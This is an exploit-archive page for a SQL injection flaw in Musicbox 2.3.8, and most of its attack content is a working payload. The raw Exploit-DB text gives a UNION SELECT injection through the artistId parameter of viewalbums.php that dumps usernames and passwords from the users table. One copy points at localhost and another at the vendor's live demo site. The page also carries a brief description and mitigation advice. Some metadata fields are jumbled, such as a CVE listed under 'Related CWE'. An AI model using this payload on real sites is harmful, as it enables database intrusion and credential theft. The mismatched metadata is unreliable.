header-logo
Suggest Exploit
vendor:
Musicbox Version 2.3.8
by:
Snakespc
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Musicbox Version 2.3.8
Affected Version From: 2.3.2008
Affected Version To: 2.3.2008
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: a:musicboxv2:musicbox_v2:2.3.8
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Script: Musicbox Version 2.3.8 Remote SQL Injection Vulnerability

This vulnerability allows an attacker to inject malicious SQL code into the vulnerable application. In this case, the vulnerable application is Musicbox Version 2.3.8. The exploit code allows an attacker to extract usernames and passwords from the application's database.

Mitigation:

The application should be updated to the latest version and input validation should be implemented to prevent malicious SQL code from being injected.
Source

Exploit-DB raw data:

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
                                                                                       
                             Script: Musicbox Version 2.3.8  Remote SQL Injection Vulnerability                                  
                                                                                                              
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =       =                 :::::Mail: snakespc@gmail.com:::::::             =         =
                =                                                                                    =
                =                Sript Demo:http://www.musicboxv2.com/services/demo.php              =
                =                                www.musicboxv2.com                                  =              
                 =================================== Snakespc ======================================    


Exploit:

http://www.localhost/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

Demo :

http://www.musicboxv2.com/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
                                                                   
===================================================================================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
ALL www.Snakespc.com/SC >>>> Members 
str0ke.....>>>>.....milw0rm
===================================================================================================================

# milw0rm.com [2008-11-18]